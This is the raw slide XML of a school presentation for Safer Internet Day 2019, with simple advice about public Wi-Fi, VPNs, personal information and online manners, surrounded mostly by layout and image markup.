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Maven Pro" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId13"/>
      <p:bold r:id="rId14"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nunito ExtraBold" panose="020B0604020202020204" charset="0"/>
      <p:bold r:id="rId15"/>
      <p:boldItalic r:id="rId16"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Maven Pro Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId17"/>
      <p:bold r:id="rId18"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nunit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4ec921785e_1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4ec921785e_1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4ec921785e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4ec921785e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4ec921785e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4ec921785e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4ec921785e_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4ec921785e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4ec921785e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4ec921785e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4ec921785e_1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2" name="Google Shape;322;g4ec921785e_1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4ec921785e_1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2" name="Google Shape;332;g4ec921785e_1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4ec921785e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4ec921785e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4ec921785e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4ec921785e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jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.jp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36.pn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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.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0.jp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6.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpg"/><Relationship Id="rId7"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24.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpg"/><Relationship Id="rId7"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5693650" y="1359000"/>
            <a:ext cx="2181000" cy="43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ru" sz="1400" dirty="0"/>
              <a:t>Prepared by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Zoreslav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Usik</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5857300" y="1697775"/>
            <a:ext cx="1853700" cy="695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1000"/>
              <a:t>Lutsk Secondary School №24 - Technological Lyceum</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132700" y="635649"/>
            <a:ext cx="3946800" cy="10621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sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>International Safer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Nunito ExtraBold"/>
                <a:ea typeface="Nunito ExtraBold"/>
                <a:cs typeface="Nunito ExtraBold"/>
                <a:sym typeface="Nunito ExtraBold"/>
              </a:rPr>
              <a:t>Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Nunito ExtraBold"/>
                <a:ea typeface="Nunito ExtraBold"/>
                <a:cs typeface="Nunito ExtraBold"/>
                <a:sym typeface="Nunito ExtraBold"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Nunito ExtraBold"/>
                <a:ea typeface="Nunito ExtraBold"/>
                <a:cs typeface="Nunito ExtraBold"/>
                <a:sym typeface="Nunito ExtraBold"/>
              </a:rPr>
              <a:t>ay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Nunito ExtraBold"/>
                <a:ea typeface="Nunito ExtraBold"/>
                <a:cs typeface="Nunito ExtraBold"/>
                <a:sym typeface="Nunito ExtraBold"/>
              </a:rPr>
              <a:t>2019</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Nunito ExtraBold"/>
              <a:ea typeface="Nunito ExtraBold"/>
              <a:cs typeface="Nunito ExtraBold"/>
              <a:sym typeface="Nunito Extra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ru"/>
              <a:t>Be careful with public Wi - Fi </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="369" name="Google Shape;369;p22" descr="Картинки по запросу wifi"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="11652"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5123275" y="527975"/>
            <a:ext cx="1264375" cy="847925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Google Shape;370;p22" descr="Картинки по запросу wifi"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="86200"/>
            <a:ext cx="662625" cy="662625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="371" name="Google Shape;371;p22" descr="Картинки по запросу wifi"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2811200" y="1179359"/>
            <a:ext cx="1355300" cy="949792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="372" name="Google Shape;372;p22" descr="Картинки по запросу wifi"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7464775" y="1865200"/>
            <a:ext cx="1406875" cy="1055150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="373" name="Google Shape;373;p22" descr="Картинки по запросу public wifi"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7011825" y="225850"/>
            <a:ext cx="1981725" cy="1321150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346025" y="1759100"/>
            <a:ext cx="4345500" cy="166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sz="1800">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>You need to know:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>   use wifi with passwords;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>   use VPN services;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>   do not enter passwords to your data;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>   turn off wifi after using;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="375" name="Google Shape;375;p22" descr="Картинки по запросу wifi"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971350" y="3425900"/>
            <a:ext cx="2305050" cy="1666875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522638" y="2256113"/>
            <a:ext cx="51300" cy="51300"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">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000000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522638" y="2541200"/>
            <a:ext cx="51300" cy="51300"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">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000000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;378;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522638" y="2826313"/>
            <a:ext cx="51300" cy="51300"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">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000000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522638" y="3087163"/>
            <a:ext cx="51300" cy="51300"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>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000000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="380" name="Google Shape;380;p22" descr="Картинки по запросу VPN"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630100" y="2414225"/>
            <a:ext cx="305250" cy="305250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Google Shape;381;p22" descr="Картинки по запросу password"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4666425" y="2699341"/>
            <a:ext cx="305250" cy="305272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="382" name="Google Shape;382;p22" descr="Картинки по запросу Wifi"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3336225" y="2129150"/>
            <a:ext cx="305250" cy="305250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="383" name="Google Shape;383;p22" descr="Картинки по запросу Wifi"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276400" y="2965681"/>
            <a:ext cx="305250" cy="30359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266000" y="591000"/>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Don’t share personal information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="285" name="Google Shape;285;p14" descr="Картинки по запросу Don’t share personal information logo"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839375" y="3653425"/>
            <a:ext cx="3228975" cy="1419225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Google Shape;286;p14" descr="Картинки по запросу personal information logo"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200875" y="166396"/>
            <a:ext cx="1822925" cy="1150625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="287" name="Google Shape;287;p14" descr="Картинки по запросу personal information logo"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1490100" cy="647200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5952875" y="3199525"/>
            <a:ext cx="1656600" cy="45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sz="2000">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>You should:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616050" y="1802075"/>
            <a:ext cx="3339900" cy="2634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050">
              <a:highlight>
                <a:srgbClr val="ECECEC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200"/>
              <a:t>Recorded information about an identifiable individual that may include his or her  name, address, email address, phone number, race, nationality, ethnicity, origin, color, age, sex, family status, identifying number, code, symbol, finger prints, blood type, inherited characteristics, health care history including information on physical/mental disability, educational, financial, criminal, employment history, others' opinion about the individual, and personal views except those about other individuals.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1050">
              <a:highlight>
                <a:srgbClr val="ECECEC"/>
              </a:highlight>
            </a:endParaRPr>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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312950" y="1590300"/>
            <a:ext cx="3499200" cy="36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sz="1800">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>What is personal information?</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro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Always be nice </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="296" name="Google Shape;296;p15" descr="Картинки по запросу be nice"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6247825" y="121913"/>
            <a:ext cx="1638300" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="297" name="Google Shape;297;p15" descr="Картинки по запросу Smile"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="45375" y="69000"/>
            <a:ext cx="582449" cy="582449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627825" y="2899900"/>
            <a:ext cx="3000000" cy="92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a:t>If you are upset or have a bad mood, you will become more attackable to attackers.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476500" y="2387500"/>
            <a:ext cx="2518800" cy="51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sz="1800">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>Why always be nice? </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>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Your kids &amp; the Internet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="305" name="Google Shape;305;p16" descr="Картинки по запросу Kids &amp; the Internet"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
